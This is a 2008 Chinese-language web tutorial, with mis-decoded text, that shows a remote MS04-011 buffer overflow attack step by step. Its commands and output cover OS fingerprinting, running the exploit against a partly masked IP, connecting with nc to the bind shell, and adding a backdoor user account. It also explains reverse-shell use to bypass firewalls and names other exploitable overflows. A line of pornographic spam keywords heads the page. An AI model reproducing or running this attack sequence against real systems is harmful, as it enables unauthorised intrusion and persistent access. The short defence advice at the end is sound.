亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

系統(tǒng)漏洞溢出攻擊實(shí)例(圖)

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 18:23:26   作者:佚名   我要評(píng)論
我們來(lái)看一下以前比較精典的一個(gè)溢出實(shí)例ms04011溢出: Microsoft Windows XP [版本 5.1.2600] (C) 版權(quán)所有 1985-2001 Microsoft Corp. C:windowssystem32cd C:> C:>getos 2**.159.31.96 (判斷操作系統(tǒng)) ----------------------------
我們來(lái)看一下以前比較精典的一個(gè)溢出實(shí)例ms04011溢出:
Microsoft Windows XP [版本 5.1.2600]
(C) 版權(quán)所有 1985-2001 Microsoft Corp.
C:\windows\system32\cd\
C:\>
C:\>getos 2**.159.31.96 (判斷操作系統(tǒng))
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:\>
C:\>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:\>
C:\>nc 2**.159.31.96 1234 (nc進(jìn)行連接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版權(quán)所有 1985-2001 Microsoft Corp.
D:\WINDOWS\system32> (得到目標(biāo)機(jī)shell)
D:\WINDOWS\system32>net user test test /add
net user test test /add
命令成功完成。 (建立用戶)
上面只是簡(jiǎn)單演示了一下溢出過(guò)程,上例是正向溢出,只是直接溢出后用nc進(jìn)行連接,還可以反向溢出,反向溢出一般用來(lái)突破防火墻,先用nc在本機(jī)監(jiān)聽(tīng)一個(gè)端口,等待反向溢出的服務(wù)器連接過(guò)來(lái)從而得到一個(gè)system權(quán)限的shell。對(duì)于溢出還有很多,如iis、mso4045、ms04049、ms05039、ms05051、ms06061等還有一些精典的應(yīng)用程序遠(yuǎn)程溢出,如未打sp3的mssql遠(yuǎn)程溢出可以直接得到系統(tǒng)權(quán)限。還有imail服務(wù)也一樣可以通過(guò)遠(yuǎn)程溢出獲得系統(tǒng)權(quán)限。還有很多病毒如沖擊波、震蕩波等病毒都是利用的rpc和lsass溢出漏洞,在感染一臺(tái)機(jī)器后又不斷的以此機(jī)器為節(jié)點(diǎn)掃描網(wǎng)絡(luò)中的其它存在漏洞的機(jī)器進(jìn)行溢出植入病毒程序,這樣不斷的繁殖下去。
不過(guò)在windiws2003下溢出就無(wú)用武之地了,因?yàn)樵?003的保護(hù)機(jī)制里面還有一個(gè)技術(shù)是可控的SEH處理函數(shù)指針,2003中結(jié)構(gòu)化異常處理例程注冊(cè)后,它的函數(shù)指針會(huì)保存在模塊中的一個(gè)叫Load Configuration Directory的地址列表中,如果函數(shù)返回時(shí)系統(tǒng)發(fā)現(xiàn)堆棧中的Cookie發(fā)生了改變,視為溢出,系統(tǒng)就會(huì)查看當(dāng)前線程相關(guān)的SEH中是否有相應(yīng)的處 理函數(shù)指針,有的話,系統(tǒng)將該指針與已經(jīng)注冊(cè)過(guò)函數(shù)的地址列表進(jìn)行對(duì)照,如果沒(méi)有發(fā)現(xiàn)匹配的,而且處理函數(shù)指針在堆棧中,異常處理函數(shù)就不運(yùn)行。如果該處 理函數(shù)指針位于已加載的各個(gè)DLL模塊地址范圍只外,或堆中,處理函數(shù)會(huì)被執(zhí)行,這種可控制的異常處理技術(shù)就會(huì)使傳統(tǒng)的覆蓋SEH指針的方法失敗。雖然可以用已經(jīng)加載模塊以外的地址來(lái)覆蓋SHE但在遠(yuǎn)程溢出中仍顯得無(wú)力。
我們?cè)賮?lái)看看本地溢出,本地溢出主要用來(lái)進(jìn)行權(quán)限提升,前面的serv-u的本地溢出已經(jīng)注入中講解了,我們現(xiàn)在再來(lái)看一下本地的一個(gè)特權(quán)提升漏洞,如圖:

通過(guò)執(zhí)行本地溢出直接從user用戶提升到系統(tǒng)權(quán)限。
對(duì)溢出攻擊的安全防范:
關(guān)閉139端口,停掉icp/ip netbios服務(wù)。
在本地連接的屬性窗口中tcp/ip協(xié)議中的高級(jí)選項(xiàng)里“禁用tcp/ip上的netbios(s)”因?yàn)楹芏嘁绯龆际抢玫倪@個(gè)通道。
安裝防火墻是必要的。
打上重要漏洞的補(bǔ)?。ㄈ鐩_擊波補(bǔ)丁、震蕩波補(bǔ)?。?,并開(kāi)啟系統(tǒng)的自動(dòng)更新功能。
服務(wù)器使用windows2003系統(tǒng)。

相關(guān)文章

  • 我們不知道的秘密? 黑客可以使用硬件破解GSM A5加密算法

    以前我們都是在使用基于早期信號(hào)標(biāo)準(zhǔn)的GSM手機(jī),這也是當(dāng)前應(yīng)用最為廣泛的移動(dòng)電話標(biāo)準(zhǔn),但是大家可能還不知道,現(xiàn)在專業(yè)的黑客可以只需要使用三張NVIDIA GeForce GTX690顯
    2016-11-06
  • SQL通用防注入系統(tǒng)asp版漏洞

    今晚群里朋友叫看個(gè)站,有sql防注入,繞不過(guò),但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。
    2012-05-15
  • 關(guān)于簡(jiǎn)單的php源代碼泄露漏洞的發(fā)掘

    我們知道在asp中出現(xiàn)得最多的還是sql注入,不過(guò)在php中由于magic_quotes_gpc為on的情況下特殊字符會(huì)被轉(zhuǎn)義,所以即使有很多時(shí)候存在sql注入也無(wú)法利用。但是php強(qiáng)大的文件
    2008-10-08
  • 解析暴庫(kù)漏洞原理及規(guī)律

    我看暴庫(kù)漏洞原理及規(guī)律 SQL注入流行很久了,我們找漏洞注入目的無(wú)非是想得到數(shù)據(jù)庫(kù)內(nèi)的東西,比如用戶名密碼等,更進(jìn)一步的MSSQL數(shù)據(jù)庫(kù)還可以借此獲得權(quán)限?;贏ccess
    2008-10-08
  • 黑客域名劫持攻擊的基本步驟

    近期發(fā)現(xiàn)adobe.com,internet.com,nike.com,等等著名站點(diǎn)都分分遭受到攻擊,但攻擊者所使用的技術(shù)并不是以往所使用的入侵WEB服務(wù)器,更改主頁(yè)的慣用手法,攻擊者使用的是一
    2008-10-08
  • FCKeditor JSP版漏洞

    FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFol
    2009-04-20
  • SOCKCAP代理的設(shè)置方法(圖)

    1.安裝完軟件,打開(kāi)后: 2.按照?qǐng)D中點(diǎn)選正確的設(shè)置,填寫上你自己找到的代理IP地址,端口,或者帳號(hào)和密碼: 3.(這一步看情況定:有的代理不要
    2008-10-08
  • pstools使用方法

      軟件名稱:Pstools   運(yùn)行平臺(tái):Windows   軟件授權(quán):免費(fèi)軟件   軟件大?。?50KB   下面我用一個(gè)實(shí)例來(lái)講解這個(gè)命令的使用。假設(shè)我要對(duì)192.168.0.8計(jì)算機(jī)進(jìn)行
    2009-07-05
  • WordPress自動(dòng)更新漏洞:超1/4網(wǎng)站可被黑客一舉擊潰

    最近大部分的WordPress網(wǎng)站都受到影響,主要的原因就是WordPress的自動(dòng)更新功能造成的,因此全球超1/4的網(wǎng)站被黑
    2016-11-29

最新評(píng)論